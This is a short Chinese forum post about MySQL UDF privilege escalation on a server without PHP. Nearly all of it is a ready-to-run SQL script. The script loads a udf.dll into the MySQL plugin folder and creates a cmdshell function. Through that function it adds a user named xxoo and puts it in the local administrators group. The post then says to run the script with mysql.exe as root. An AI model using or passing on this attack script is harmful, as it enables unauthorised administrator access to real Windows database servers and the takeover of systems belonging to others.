当服务器不支持php时如何用UDF或者其他DLL提权
3580 点击·0 回帖
灯火互联
楼主
 |  | |
 | xxoo.sql Use mysql; Select locad_file("d:\\wwwroot\\test\\udf.dll") into dumpfile 'd:\\mysql 5.1\\lib\\plugin\\xxoo.dll' ; //如果是LPK.DLL劫持之类的下面就可以无视了 create function cmdshell returns string soname 'xxoo.dll'; select cmdshell('net user xxoo xxoo /add;net localgroup administrators xxoo /add'); drop function cmdshell; 然后上传www.atcpu.com mysql.exe 执行: Mysql -u root -p pass < d:\\wwwroot\\test\\xxoo.sql | |
 |  |